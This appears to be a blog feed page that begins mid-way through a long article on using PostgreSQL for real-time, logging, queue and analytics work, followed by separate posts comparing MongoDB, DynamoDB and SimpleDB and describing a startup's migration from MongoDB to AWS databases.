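);

CREATE OR REPLACE FUNCTION notify_new_message() RETURNS trigger AS $$
BEGIN
    -- Publish the new row as JSON on the 'new_message' channel.
    PERFORM pg_notify('new_message', row_to_json(NEW)::text);
    RETURN NEW;
END;
$$ LANGUAGE plpgsql;

CREATE TRIGGER messages_notify
    AFTER INSERT ON messages
    FOR EACH ROW EXECUTE PROCEDURE notify_new_message();

-- The application side simply does:
LISTEN new_message;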

PostgreSQL cannot give you hard real-time guarantees, unfortunately. So custom high-end video processing and storage systems, or specialized high-speed financial products, are not domains PostgreSQL is suited for.

          How well does it perform? In the Queue section, I mentioned thousands of events per core on an old laptop.

The issues for latency are the query planner and optimizer, VACUUM, and ANALYZE.

The query planner is sort of amazing, but also sort of annoying. It can automatically try to figure out the best way to query data for you. However, it doesn't automatically create an index where it thinks one would be good. Depending on environmental factors, like how much CPU and IO you have, how much data is in the various tables, and other statistics it gathers, it can change the way it searches for data. This is LOTS better than having to write your queries by hand and then update them every time the schema, host, or amount of data changes.

But sometimes it gets things wrong, and that isn't acceptable when you have performance requirements. William Stein (from the SageMath project) wrote about some queries mysteriously being slow some of the time at [7]. This was after porting his web app to use PostgreSQL instead of RethinkDB (TL;DR: the port was possible and the result faster). The solution is usually to monitor those slow queries and try to force the query planner to follow a path that you know is fast, or to add, remove, or tweak the index the query may or may not be using. Brady Holt wrote a good article on "Performance Tuning Queries in PostgreSQL".
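In practice that tuning loop is mostly EXPLAIN plus an index change. A hypothetical example (the table and column names are invented here):

-- See what the planner actually does, with real timings.
EXPLAIN ANALYZE
SELECT * FROM orders WHERE customer_email = 'someone@example.com';

-- If it shows a slow sequential scan, add an index that matches the query,
-- then re-run EXPLAIN ANALYZE to confirm the plan changed.
CREATE INDEX CONCURRENTLY orders_customer_email_idx
    ON orders (customer_email);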

          Later on I cover the topic of column databases, and 'real time' queries over that type of data popular in financial and analytic products (pg doesn't have anything built in yet, but extensions exist).

VACUUM ANALYZE is a process that cleans up your data. It's a garbage collector (VACUUM) combined with a statistician (ANALYZE). Every release of PostgreSQL seems to improve its performance for various corner cases. It used to have to be run manually; now automatic VACUUM is a thing. Many more things can be done concurrently, and it can avoid having to read all the data in many more situations. However, like all garbage collectors, it sometimes causes pauses. On the plus side, it can make your data smaller and inform itself about how to make queries faster. If you need to, you can turn off autovacuum and do things more manually. Also, you can run just the ANALYZE part to gather statistics, which can run much faster than VACUUM.

To get better latency with Python and PostgreSQL, there is asyncpg by MagicStack, which uses an asynchronous network model (Python 3.5+) and the binary PostgreSQL protocol. This can give 2ms query times and is often faster than even golang and nodejs. It also lets you read in a million rows per second from PostgreSQL to Python per core [8]. Memory allocations are reduced, as is context switching - both things that cause latency.

          For these reasons, I think it's "good enough" for many soft real time uses, where the occasional time budget failure isn't the end of the world. If you load test your queries on real data (and for more data than you have), then you can be fairly sure it will work ok most of the time. Selecting the appropriate client side driver can also give you significant latency improvements.



          More reading.
          1. http://blog.sagemath.com/2017/02/09/rethinkdb-vs-postgres.html
          2. https://almightycouch.org/blog/realtime-changefeeds-postgresql-notify/
          3. https://blog.andyet.com/2015/04/06/postgres-pubsub-with-json/
          4. https://github.com/klaemo/postgres-triggers
          5. https://www.confluent.io/blog/bottled-water-real-time-integration-of-postgresql-and-kafka/
          6. https://www.geekytidbits.com/performance-tuning-postgres/
          7. http://blog.sagemath.com/2017/02/09/rethinkdb-vs-postgres.html 
          8. https://magic.io/blog/asyncpg-1m-rows-from-postgres-to-python/


          Log storage and processing

          Being able to have your logs in a central place for queries, and statistics is quite helpful. But so is grepping through logs. Doing relational or even full text queries on them is even better.

rsyslog allows you to easily send your logs to a PostgreSQL database [1]. You set it up so that it stores the logs in files, but sends them to your database as well. This means that if the database goes down for a while, the logs are still there. The rsyslog documentation has a section on high-speed logging by using buffering on the rsyslog side [4].

systemd is the more modern logging system, and it allows logging to remote locations with systemd-journal-remote. It sends JSON lines over HTTPS. You can take the data in with systemd (using it as a buffer) and then pipe it into PostgreSQL with COPY at high rates. The other option is to use systemd's support for sending logs to a traditional syslog like rsyslog, which can then send them into PostgreSQL.

Often you want to grep your logs. SELECT with regex matching can be used for grep/grok-like functionality. It can also be used to parse your logs into a table format you can more easily query.
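A small sketch of that grep-style querying over a raw log table (names are illustrative):

CREATE TABLE raw_logs (
    received_at timestamptz NOT NULL DEFAULT now(),
    message     text        NOT NULL
);

-- "grep ERROR" with a regular expression match.
SELECT received_at, message
  FROM raw_logs
 WHERE message ~ 'ERROR|FATAL';

-- Parse pieces of each matching line into columns (rows that do not
-- match the pattern are dropped, as with an inner join).
SELECT received_at, m[1] AS host, m[2] AS program, m[3] AS rest
  FROM raw_logs,
       regexp_matches(message, '^(\S+)\s+(\S+)\s+(.*)$') AS m;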

          TRIGGER can be used to parse the data every time a log entry is inserted. Or you can use MATERIALIZED VIEWs if you don't need to refresh the information as often.

Is it fast enough? See this talk by Steven Simpson at the FOSDEM conference about infrastructure monitoring with PostgreSQL. In it he talks about using PostgreSQL to monitor and log a 100-node system. PostgreSQL on a single old laptop can quite happily ingest at a rate in the hundreds of thousands of messages per second. Citus Data is an out-of-core solution which builds on PostgreSQL (and contributes to it, yay!). It is being used to process billions of events, and it is used by some of the largest companies on the internet (e.g. Cloudflare, which handles 5% of internet traffic, uses it for logging). So PostgreSQL can scale up too (with out-of-core extensions).

Batteries included? In the time series database section of this article, I mentioned that you can use Grafana with PostgreSQL (with some effort). You can use this for dashboards and alerting (amongst other things). However, I don't know of any really good systems (Sentry, Datadog, the ELK stack) which have first-class PostgreSQL support out of the box.

One advantage of having your logs in there is that you can write custom queries quite easily. Want to know how many requests per second there were from app server 1, and link that up to your slow query log? That's just a normal SQL query, and you don't need to have someone grep through the logs... normal SQL tools can be used. When you combine this functionality with existing SQL analytics tools, it is quite nice.

I think it's good enough for many small uses. If you've got more than 100 nodes, or are doing a lot of events, it might not be the best solution (unless you have quite a powerful PostgreSQL cluster). It does take a bit more work, and it's not the road most traveled. However, it does let you use all the SQL analytics tools alongside one of the best metrics and alerting systems.


          More reading.
          1. http://www.rsyslog.com/doc/v8-stable/tutorials/database.html
          2. https://www.postgresql.org/docs/9.6/static/plpgsql-trigger.html
          3. https://www.postgresql.org/docs/9.6/static/functions-matching.html
          4. http://www.rsyslog.com/doc/v8-stable/tutorials/high_database_rate.html

          Queue for collecting data

          When you have traffic bursts, it's good to persist the data quickly, so that you can queue up processing for later. Perhaps you normally get only 100 visitors per day, but then some news article comes out or your website is mentioned on the radio (or maybe spammers strike) -- this is bursty traffic.

Storing data for processing later is something that systems like Kafka excel at.
Using the COPY command rather than lots of separate inserts can give you a very nice speedup for buffering data. If you do some processing on the data, or have constraints and indexes, all of these things slow it down. So instead you can just put it in a plain table, and then process the data like you would with a queue.
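A small sketch of that buffer-table idea (names invented; from an application you would use COPY ... FROM STDIN via your driver, e.g. psycopg2's copy_expert, or \copy from psql, since COPY from a server-side file needs extra privileges):

CREATE TABLE raw_events (
    received_at timestamptz NOT NULL DEFAULT now(),
    line        text        NOT NULL
);

-- Bulk load a batch of lines in one round trip; much faster than
-- issuing one INSERT per line.
COPY raw_events (line) FROM '/tmp/events.log';

-- Later, process the buffered rows like a queue (see the queue section).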

          A lot of the notes for Log storage, and Queuing apply here. I guess you're starting to see a pattern? We've been able to use a few building blocks to implement efficient patterns that allow us to use PostgreSQL which might have required specialized databases in the past.

          The fastest way to get data into PostgreSQL from python? See this answer [1] where 'COPY {table} FROM STDIN WITH BINARY' is shown to be the fastest way.


          More reading.

          High availability, elasticity.

          “Will the database always be there for you? Will it grow with you?”
          To get things going quickly there are a number of places which offer PostgreSQL as a service [3][4][5][6][7][8]. So you can get them to setup replication, monitoring, scaling, backups, and software updates for you.

          The Recovery Point Objective (RPO), and Recovery Time Objective (RTO) are different for every project. Not all projects require extreme high availability. For some, it is fine to have the recovery happen hours or even a week later. Other projects can not be down for more than a few minutes or seconds at a time. I would argue that for many non-critical websites a hot standby and offsite backup will be 'good enough'.

I would highly recommend this talk by Gunnar Bluth - "An overview of PostgreSQL's backup, archiving, and replication". However, you might want to preprocess the sound with your favourite sound editor (e.g. Audacity) to remove the feedback noise. The slides are there as well, without any ear-destroying feedback sounds.

By using a hot standby secondary replica you get the ability to quickly fail over from your main database, so you can be back up within minutes or seconds. By using pgbarman or WAL-E, you get point-in-time-recovery offsite backups of the database. To make managing the replicas easier, a tool like repmgr can come in handy.

          Having really extreme high availability with PostgreSQL is currently kind of hard, and requires out of core solutions. It should be easier in version 10.0 however.

Patroni is an interesting system which helps you deploy a high availability cluster on AWS (with Spilo), and work is in progress so that it also works on Kubernetes clusters. Spilo is currently being used in production and can do various management tasks, like auto scaling, backups, and node replacement on failure. It can work with a minimum of three nodes.

As you can see, there are multiple systems and multiple vendors that help you scale PostgreSQL. On the low end, you can have backups of your database to S3 for cents per month, and a hot standby replica for $5/month. You can also scale a single node all the way up to a machine with 24TB of storage, 32 cores, and 244GB of memory. That's not in the same range as Cassandra installations with thousands of nodes, but it's still quite an impressive range.


          More reading.
          1. https://edwardsamuel.wordpress.com/2016/04/28/set-up-postgresql-9-5-master-slave-replication-using-repmgr/
          2. https://fosdem.org/2017/schedule/event/postgresql_backup/
          3. https://www.heroku.com/postgres
          4. http://crunchydata.com/
          5. https://2ndquadrant.com/en/
          6. https://www.citusdata.com/
          7. https://www.enterprisedb.com/
          8. https://aws.amazon.com/rds/postgresql/


          Column store, graph databases, other databases, ... finally The End?

          This article is already way too long... so I'll go quickly over these two topics.

Graph databases like Neo4j allow you to do complex graph queries: edges, nodes, and hierarchies. How to do that in PostgreSQL? Denormalise the data, and use a path-like attribute and LIKE. So to find things in a graph, say all the children of a node, you can pre-compute the path inside a string, rather than doing complex recursive queries and joins using foreign keys.
          SELECT * FROM nodes WHERE path LIKE '/parenta/child2/child3%';
Then you don't need super complex queries to get the graph structure from parent_id, child_ids, and such. (Remember from before how you can use a trigram index for fast LIKEs?) You can also use other pattern matching queries on this path, to do things like find all the parents up to 3 levels up that have a child.
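A minimal sketch of the path-as-string idea, with a trigram index to keep those LIKEs fast (names are illustrative):

CREATE EXTENSION IF NOT EXISTS pg_trgm;

CREATE TABLE nodes (
    id   bigserial PRIMARY KEY,
    path text NOT NULL,   -- e.g. '/parenta/child2/child3'
    name text NOT NULL
);

-- GIN trigram index speeds up LIKE '%...%' and prefix searches.
CREATE INDEX nodes_path_trgm ON nodes USING GIN (path gin_trgm_ops);

-- All descendants of /parenta/child2:
SELECT * FROM nodes WHERE path LIKE '/parenta/child2/%';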

Tagging data with a fast LIKE becomes very easy as well: just store the tags in a comma-separated field and use an index on it.

Column stores are where the data is stored in a column layout instead of in rows. They are often used for real-time analytic workloads. One of the oldest and best of these is kdb+. Google made one, Druid is another popular one, and there are also plenty of custom ones used in graphics.

          But doesn't PostgreSQL store everything in row based format? Yes it does. However, there is an open source extension called cstore_fdw by Citus Data which is a column-oriented store for PostgreSQL.
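Setting it up looks roughly like this, based on the cstore_fdw README (the foreign table definition is a made-up example):

-- After installing the extension on the server:
CREATE EXTENSION cstore_fdw;
CREATE SERVER cstore_server FOREIGN DATA WRAPPER cstore_fdw;

CREATE FOREIGN TABLE taxi_rides (
    pickup_time     timestamptz,
    fare_amount     numeric,
    passenger_count int
)
SERVER cstore_server
OPTIONS (compression 'pglz');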

So how fast is it? There is a great series of articles by Mark Litwintschik, where he benchmarks a billion-row taxi ride data set with PostgreSQL, kdb+, and various other systems. Without cstore_fdw or parallel workers, PostgreSQL took 3.5 hours to do a query. With 4 parallel workers, it was reduced to 1 hour and 1 minute. With cstore_fdw it took 2 minutes and 32 seconds. What a speed up!

          The End.

          I'm sorry that was so long. But it could have been way longer. It's not my fault...


          PostgreSQL carries around such a giant Tool Chest.


Hopefully all these words will be helpful next time you want to use PostgreSQL for something outside of relational data. Also, I hope you can see that it can be possible to replace ten database systems with just one, and that by doing so you can gain a significant ops advantage.

          Any corrections or suggestions? Please leave a comment, or see you on twitter @renedudfield
          There was discussion on hn and python reddit.

                    Comment on How important is it to use 2-byte and 3-byte integers? by Morgan Tocker        
Some additional discussion here: https://github.com/github/gh-ost/issues/353. For some semi-proof that the InnoDB buffer pool is not variable-length in memory, you can look at the pfs memory instrumentation in 5.7: the buffer pool is all one allocation, just larger than innodb_buffer_pool_size.
                    Comment on MySQL soon to store system tables in InnoDB by Jameson        
          So soon?
                    7 Reasons You Should Use MongoDB over DynamoDB         
Even though I recently migrated from MongoDB to DynamoDB and shared 3 reasons to use DynamoDB, I still love MongoDB; it is a really good NoSQL solution. Here are some points to help you decide on using MongoDB over DynamoDB.

          Reason 1: Use MongoDB if your indexing fields might be altered later.
With DynamoDB, it's NOT possible to alter indexing after the table has been created. I have to admit that there are workarounds; for example, you can create a new table and import the data from the old one. But none of them is straightforward, and you need to accept some trade-offs if you use a workaround. Back to indexing: DynamoDB allows you to define a hash key to make the data well distributed, and then to add a range key and secondary indexes. When querying a table, the hash key must be used, together with either the range key or one of the secondary indexes. No complex queries are supported. The hash key, range key, and secondary index definitions can NOT be changed later, so your database structure must be well designed before going to production. By the way, a secondary index occupies additional storage: if you have 1G of data, and you create an index and "project" all attributes into it, then your actual storage cost will be 2G. If you project only the hash and range key values into the index, then you need to query twice to get the whole record. Actually the API allows you to invoke the query only once, but the cost in read capacity is doubled. In addition, you can still "scan" the data and filter by conditions on un-indexed keys, but please check the data in my previous post: a scan can be 100 times (or more) slower than a query.

Reason 2: Use MongoDB if you need the features of a document database as your NoSQL solution.
If you want to save a document like this:
{
    _id: 1,
    name: { first: 'John', last: 'Backus' },
    birth: new Date('Dec 03, 1924'),
    death: new Date('Mar 17, 2007'),
    contribs: [ 'Fortran', 'ALGOL', 'Backus-Naur Form', 'FP' ],
    awards: [
        {
            award: 'National Medal of Science',
            year: 1975,
            by: 'National Science Foundation'
        },
        {
            award: 'Turing Award',
            year: 1977,
            by: 'ACM'
        }
    ]
}
          (sample document from MongoDB technical document)
With a document database, you'll be able to query by name.first, or by whether some value exists in the awards sub-documents. However, DynamoDB is a key-value database and supports only values or sets; no sub-documents are supported, and no complex indexes or queries. It's not possible to save the sub-document { first: 'John', last: 'Backus' } to name, and accordingly it's not possible to query by name.first.

          Reason 3: Use MongoDB if you are going to use Perl, Erlang, or C++.
The official AWS SDKs support Java, JavaScript, Ruby, PHP, Python, and .NET, while MongoDB supports more. I used Node.js to build my backend server, and both the AWS SDK for Node.js and the mongoose SDK for MongoDB work very well. It's really amazing to use mongoose for MongoDB: it's in active development, and the defects I report against mongoose get fixed quickly. I also have experience using the AWS SDK for Java and morphia for MongoDB, and both of them work perfectly! The SDKs for AWS and MongoDB are all well designed and widely used. But if your programming language is not on the official support list, you may need to evaluate the quality of the SDK carefully. I once used a non-official Java SDK for AWS SimpleDB; it was also good, but I could still easily hit defects. For example, when using Boolean in the object persistence model, the Java SDK for SimpleDB could not handle this type and produced bad results.

          Reason 4: Use MongoDB if you may exceed the limits of DynamoDB.
Please be careful about the limits and read them carefully if you are evaluating DynamoDB. You may easily exceed some of them. For example, the value you store in an item (the value of a key) cannot exceed 64KB. It's easy to exceed 64KB when you allow users to input content; a user may paste 100KB of text as an article title by mistake. There is also a workaround: I divide the content over multiple keys if it exceeds the limit, and aggregate them back into one key in the post-processing stage after reading the data from the DynamoDB server. For example, the content of an article may exceed 64KB, so in the pre-processing stage when storing to DynamoDB I divide it into article.content0, article.content1, article.content2, and so on. After reading from DynamoDB, I check whether the key article.content0 exists; if it does, I continue to check article.content1, combine the values in these fields into article.content, and remove article.content0, article.content1, and so on. This adds complexity and additional dependencies to your code. MongoDB does not have these limitations.

Reason 5: Use MongoDB if you are going to have data types other than string, number, and base64-encoded binary.
In addition to string, number, binary, and array, MongoDB supports date, boolean, and a MongoDB-specific type, "ObjectID". I use mongoose.js, and it supports these data types well. When you define a data structure for object mapping, you can specify the correct type. Date and Boolean are quite important types. With DynamoDB you can use a number as an alternative, but you still need additional logic in your code to handle them. With MongoDB you get all these data types natively.

          Reason 6: Use MongoDB if you are going to query by regular expression.
RegEx queries might be an edge case, but it may come up in your situation. DynamoDB provides a way to query by checking whether a string or binary value starts with some substring, and provides the "CONTAINS" and "NOT_CONTAINS" filters when you do a "scan". But you know "scan" is quite slow. With MongoDB, you can easily query any key or sub-document with RegEx. For example, if you want to query by a user's name for "John" or "john", you can query with a simple regular expression {"name" => qr/[Jj]ohn/}, while this cannot be done in DynamoDB with one query.

Reason 7: Use MongoDB if you are a big fan of document databases.
10gen is the company backing MongoDB. They are very active in the community. I asked a question on Stack Overflow, and Dylan, a Solution Architect at MongoDB, actively followed up on my question, helped me analyze the issue, looked for the cause, and also gave some very good suggestions on MongoDB. This was a really good experience. In addition, the MongoDB community is willing to listen to users. Amazon is a big company; it's not easy to get in touch with the people inside, not to mention influence their decisions and roadmap.

Bonus tip: Read the DynamoDB documentation carefully if you are going to use it.
For example, there is an API called "batchWriteItem". This API may return no error but still give a field with the key "UnprocessedItems" in the result. This is somewhat of an anti-pattern: when I invoke a call, the result should be either success or failure, but this API gives a third status, "partially correct". You need to manually re-submit those "UnprocessedItems" again and again until there are no items left. I didn't notice this because it never happened during testing. However, when there is heavy traffic and the number of requests to DynamoDB exceeds your quota for several seconds, this may happen.

Hold on: before you make the decision to use MongoDB, please read 3 Reasons You Should Use DynamoDB over MongoDB.
                    3 Reasons You Should Use DynamoDB over MongoDB        
Recently I posted a blog to share my experience of migrating from MongoDB to DynamoDB. The migration was smooth, and here is a summary of the reasons we did it:

          Reason 1: Use DynamoDB if you are NOT going to have an employee to manage the database servers. 
This is the number one reason I migrated from MongoDB to DynamoDB. We are launching a startup, and we have a long list of user requirements from early-adopter users that we want to satisfy. I need to develop the Windows/Mac OS/Ubuntu software and the iPhone/Android apps, and I also need to work on the server that provides data synchronization among these apps. Kelly is not a technical person and doesn't have experience managing servers. Someone may say that anyone can become a web developer in 21 days; however, that really doesn't make server troubleshooting easy. With only 15k users and 1.4 million records, I started to get into serious trouble. As described in the last post, the more data I stored, the worse the database latency became. I can imagine that in the future, once I set up sharding and a replica set for each shard, database management could take a big portion of my time. With DynamoDB, you can totally avoid any database management work; AWS manages it very well. I migrated the database a week ago, and everything works very well.

          Reason 2: Use DynamoDB if you don't have the budget for dedicated database servers.
          Because I didn't have much traffic or many data records, I used 2 Linode VPS instances as database servers, each with 1G RAM and a 24G disk. The 2 database servers are grouped as a replica set, with no sharding yet. Ideally they should support my current data scale very well; however, that turned out not to be true. Upgrading the database servers would cost more and might still not resolve the issue. There are some managed MongoDB services, but I cannot really afford the cost. With the current user base, the MongoDB database occupies 8G of disk for data and 2G for the journal file. With a managed MongoDB service, I would need to select a 25G plan starting at a US$500 monthly fee; if I got more traffic and users, it would cost too much. Before migrating, I tested DynamoDB by moving all the data, that is, 1.4 million records, into it. The actual space used is less than 300M. I'm not sure how a managed MongoDB service measures this; I used a command in the mongo console to get the disk usage statistics. My first week of cost on DynamoDB was US$0.05. That was the last week of July; let's see how much it will cost in August.
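
          The post doesn't say which command was used; one common way to get those numbers in the mongo shell is db.stats() with a scale factor:

          // In the mongo shell: database-level disk statistics, scaled to megabytes.
          db.stats(1024 * 1024)                 // reports dataSize, storageSize, indexSize, etc. in MB
          // Per-collection numbers are available via db.myCollection.stats(1024 * 1024)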

          Reason 3: Use DynamoDB if you are going to integrate with other Amazon Web Services.
          For example, full-text indexing of the database. There are solutions for MongoDB, but you need to set up additional servers for indexing and search, and understand that system. The good news is that MongoDB provides a full-text index, but I can imagine that full-text indexing for multiple languages is not easy, especially Chinese word segmentation. Amazon CloudSearch is a solution for DynamoDB full-text indexing. Another example is AWS Elastic MapReduce, which can be integrated with DynamoDB very easily. Also, for database backup and restore, Amazon has other services that integrate with DynamoDB. In my opinion, as the major NoSQL database in Amazon Web Services, DynamoDB will gain more and more features, and you can speed up development and reduce the cost of server management by integrating with other Amazon Web Services.

          However, DynamoDB has its shortcomings. Before you make the decision to use DynamoDB, please read 7 Reasons You Should Use MongoDB over DynamoDB.
                    LEAN7: Migrate from MongoDB to AWS DynamoDB + SimpleDB        

          Migrate from MongoDB to DynamoDB + SimpleDB: New Server Side Architecture Ready for More Users

          Recently we reached 14,000 registered users, a small portion of whom are paid users. I feel that TeamViz is being recognized, with more and more sales (even if still a very small number) generated every month. However, I started to run into trouble with the server architecture mentioned in this post. The issue is that the MongoDB-backed database gets locked, for unknown reasons, for several minutes every 2 hours. Initially, all requests would be held for 2 minutes every 2 hours and 7 minutes. Now it has become worse: all requests are held for 7 minutes every 2 hours and 7 minutes. I asked this question on Stack Overflow, but have no answer yet. So I can either increase the capacity of the servers, or shift to another database. We are small, so I can try different solutions.

          Because all connections are held for several minutes, the connection graph on the load balancer looks like this. (At the beginning I thought the server was being attacked, but no one would attack a server every 2 hours and 7 minutes, and for a whole month, right ^_^ )


          So here are several possible solutions: use another NoSQL database, or use a managed NoSQL database. My first decision was to look for other NoSQL database servers. I have read a comparison of NoSQL solutions, this link about a NoSQL benchmark, and this link about Couchbase. Every NoSQL database has its pros and cons.

          I then talked with Kelly about the cost of servers, the cost of managed services, and the possibility of shifting to another NoSQL provider, or even to MySQL. The conclusion was that the current issue with MongoDB is just a start; we might spend more and more time managing databases and resolving performance or other unknown issues. This would cost a lot of energy, while our focus is to provide a better product. There is a lot of fun in playing with NoSQL and other cutting-edge technology, but that's not our goal. Shifting to a managed database service helps us focus on providing features and fixing issues in the product itself; at the very least we have a long list of features and issues to resolve. So we shifted to AWS DynamoDB and, to reduce the cost, put part of the data on AWS SimpleDB. The server side was almost entirely rewritten to handle the database change. I took the chance to practice the Promise pattern in node.js (it works great!) and leveraged the middleware support provided by the Express framework. In addition, we hold data from DynamoDB and SimpleDB in memcache. Everything has worked well for 24 hours (except for some error logs from memcache).
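
          The actual middleware isn't shown in the post, but the idea looks roughly like this, assuming the Express framework and the "memcached" npm package (route, key names, TTL, and the loader function are made up):

          var express = require('express');
          var Memcached = require('memcached');

          var app = express();
          var cache = new Memcached('localhost:11211');

          // Check memcache first; fall through to DynamoDB/SimpleDB only on a miss.
          function cacheFirst(req, res, next) {
            var key = 'item:' + req.params.id;
            cache.get(key, function (err, cached) {
              if (!err && cached) return res.json(cached);
              res.locals.cacheKey = key;     // let the handler know where to store the result
              next();
            });
          }

          app.get('/items/:id', cacheFirst, function (req, res) {
            loadItemFromDynamoDB(req.params.id, function (err, item) {     // hypothetical loader
              if (err) return res.status(500).end();
              cache.set(res.locals.cacheKey, item, 600, function () {});   // cache for 10 minutes
              res.json(item);
            });
          });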

          Here is the picture after 10 hours of migration. The huge periodic traffic spikes disappeared.

          Here is the new architecture for the database and sync servers.

          You may have concerns about accessing AWS from Linode; currently it's fine. We have more than 1.3 million items in one DynamoDB table, and the response time from DynamoDB to get one record by key is 25 ~ 45 ms from the Linode network. SimpleDB has less than 20k items, and also responds in 25 ~ 45 ms.
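
          A measurement along these lines can be reproduced from a Linode box with the Node.js AWS SDK (table and key names are placeholders):

          var AWS = require('aws-sdk');
          var dynamodb = new AWS.DynamoDB({ region: 'us-east-1' });

          var start = Date.now();
          // Fetch one record by its hash key.
          dynamodb.getItem({
            TableName: 'SyncItems',
            Key: { id: { S: 'some-item-id' } }
          }, function (err, data) {
            if (err) return console.error(err);
            console.log('getItem took ' + (Date.now() - start) + ' ms');   // ~25-45 ms in our case
          });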

          Some notes about the new architecture:
          - Why Linode: much cheaper than AWS EC2.
          - Why AWS DynamoDB and SimpleDB: we don't want to worry about managing databases.
          - memcached is supposed to work independently; we use Couchbase because it provides automatic clustering.
          - Still, the design goal is to scale out. Every machine is independent, and we can add more sync servers and memcached servers independently.
          - Future plan: we still need a message queue. AWS SQS does not provide a way to post an event to multiple subscribers simultaneously; RabbitMQ can do that. But a message queue is not urgent so far.
          - Future blog: I will share more experience of using SimpleDB and DynamoDB.
                    2 reasons why we select SimpleDB instead of DynamoDB        
          If you search Google for "SimpleDB vs DynamoDB", you will find a lot of helpful posts. Most of them give you 3 to 7 reasons to select DynamoDB. However, today I'll share some experience of using SimpleDB instead of DynamoDB.

          I ran into some issues when using DynamoDB in production, and finally found that SimpleDB fits my case perfectly. I think the choice between SimpleDB and DynamoDB should NOT rely on the performance or the headline benefits of DynamoDB/SimpleDB, but instead on their limitations and the real requirements of my product.

          Some background: I have some data previously saved in MongoDB, and the amount of data will most likely not exceed 2 GB in SimpleDB. We have now decided not to maintain our own MongoDB database servers, but to leverage AWS SimpleDB or DynamoDB to reduce the cost of operations.

          Both SimpleDB and DynamoDB are key/value-pair databases. There are some workarounds to store a JSON document, but they introduce additional cost. The data structure in my MongoDB is not too complicated and can be converted to key-value pairs. So, before you choose SimpleDB or DynamoDB as your database backend, you must understand this fundamental difference.
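
          For illustration, one common workaround is to flatten a nested document into dotted key/value pairs before writing it; a generic sketch (not necessarily the exact conversion used here):

          // Flatten { user: { name: 'John', active: true } } into { 'user.name': 'John', 'user.active': true }.
          function flatten(doc, prefix, out) {
            prefix = prefix || '';
            out = out || {};
            Object.keys(doc).forEach(function (key) {
              var value = doc[key];
              var path = prefix ? prefix + '.' + key : key;
              if (value !== null && typeof value === 'object' && !Array.isArray(value)) {
                flatten(value, path, out);      // recurse into nested documents
              } else {
                out[path] = value;              // leaf values become plain attributes (arrays kept as-is for simplicity)
              }
            });
            return out;
          }

          console.log(flatten({ user: { name: 'John', active: true } }));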

          Reason 1: Not flexible on indexing. With DynamoDB you have to set the indexed fields before creating the table, and they cannot be modified afterwards. This really limits future changes. DynamoDB supports 2 modes of data lookup, "Query" and "Scan". "Query" is based on the hash key and secondary keys and gives high performance; however, when you query data, the "hash" key must be set. For example, suppose we have the "id" key as the hash key. When we query by "id", it's good, and we get the best performance. But when we query only by a field "name", we have to shift to "Scan" because the hash key is not used. The performance of "Scan" is totally unacceptable because AWS will scan every record. I created a sample DynamoDB table with 100,000 records, each with 6 fields. With "Scan", it takes 2 ~ 6 minutes to select ONE record by adding a condition on one field. Here is the testing code in Java:

          // Scan the table for records whose non-key "count" attribute equals 70569.
          // "mapper" is a DynamoDBMapper from the AWS SDK for Java, and Book is the mapped entity class.
          DynamoDBScanExpression scan = new DynamoDBScanExpression();
          scan.addFilterCondition("count", new Condition()
                  .withAttributeValueList(new AttributeValue().withN("70569"))
                  .withComparisonOperator(ComparisonOperator.EQ));

          System.out.println("1=> " + new Date());
          PaginatedScanList<Book> list = mapper.scan(Book.class, scan);   // lazy, paginated result
          System.out.println("2=> " + new Date());

          Object[] all = list.toArray();            // forces every page of the scan to be fetched
          System.out.println(all.length);           // should be 1
          System.out.println("3=> " + new Date());  // 2 ~ 6 minutes after "2=>", in most cases around 2 minutes

          SimpleDB does not have this limitation. SimpleDB creates an index for EVERY field in a table (actually AWS uses the term "domain", and MongoDB uses "collection"). I modified the code a little and tested on SimpleDB; here are the results (a query sketch follows the list):

          • Query 500 items (using "limit" to get the first 500 items in a "select" call) with no condition: about 400 ms to complete. The sample application was running on my local machine; if it ran on EC2, it should be within 100 ms.
          • Query 500 items with 1 condition: also about 400 ms to complete.
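
          The original test code was Java, but the equivalent SimpleDB call with the Node.js AWS SDK looks roughly like this (domain and attribute names are made up):

          var AWS = require('aws-sdk');
          var simpledb = new AWS.SimpleDB({ region: 'us-east-1' });

          // SimpleDB indexes every attribute, so filtering on "name" needs no predefined index.
          simpledb.select({
            SelectExpression: "select * from mydomain where name = 'John' limit 500"
          }, function (err, data) {
            if (err) return console.error(err);
            console.log((data.Items || []).length + ' items returned');
          });
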
          Reason 2: Not cost-effective for our case. DynamoDB charges by provisioned read/write capacity per second. Please note that the capacity is based on the records you read/write, not on the number of API calls, regardless of whether you use the batch API or not. Here are more details from my test. I used the batch API to send 1000 records of more than 1000 bytes each. It took 50 seconds to finish the batch when the write capacity was set to 20/second. While keeping my application running, I changed the capacity to 80/second in the AWS console, and one batch then took 12 to 25 seconds to complete (ideally it should be 1000/80 = 12.5 seconds; the extra time comes from network latency, because I'm sending more than 1 megabyte of data per API call).

          In our case, we may read 500 records from SimpleDB into memory, and then read nothing for the next 10 minutes. With SimpleDB we can complete that in 500 milliseconds. With DynamoDB we would have to set the read capacity to 1000 reads/second, which would cost $94.46 per month (via the AWS Simple Monthly Calculator). With SimpleDB, it may cost less than 1 dollar.

          Conclusion: DynamoDB is really designed as a high-performance database; SimpleDB has more flexibility. What I mean by "really designed for high performance" is that if you choose DynamoDB, you must make sure you have designed your architecture for high-traffic dynamic content. If you have designed your architecture for high-traffic dynamic content and high performance, DynamoDB may match your requirements perfectly. In our case, SimpleDB is enough: excellent flexibility, and cost-effective. Before looking at comparisons of SimpleDB and DynamoDB, design your architecture first. DynamoDB is good, but it is not a fit for everyone.

          Here are some useful links:

                    A Story of "Design for Failure"        

          Now that we are in the era of cloud computing, what is the most important factor you can imagine for the cloud? You may think of scaling. It could be; scaling is very important when your business gets bigger and bigger. You may think of backup; it always should be. You may also think of programmable computing resources. That is a really important concept from AWS: machines are programmable, and you can programmatically add or delete a machine within seconds, instead of purchasing from a vendor and deploying it to a data center. You can allocate a new, reliable database without depending on an operations team. However, as a startup, my business is starting from scratch, and I do everything myself. In my practice, "Design for Failure" is really the top priority from the very beginning.

          With AWS providing EC2, and other vendors providing VPSes, it is common sense to use a VPS instead of building your own data center when you are not that big. Scaling is not so important yet, because I'm still very small and a limited number of machines is enough to support the current user scale, though I did design for future scaling. Design for failure? Yes, I had considered it, but not so seriously. My VPS provider, Linode, claims 99.95% availability, and Linode has a very good reputation in this industry. I trust them.

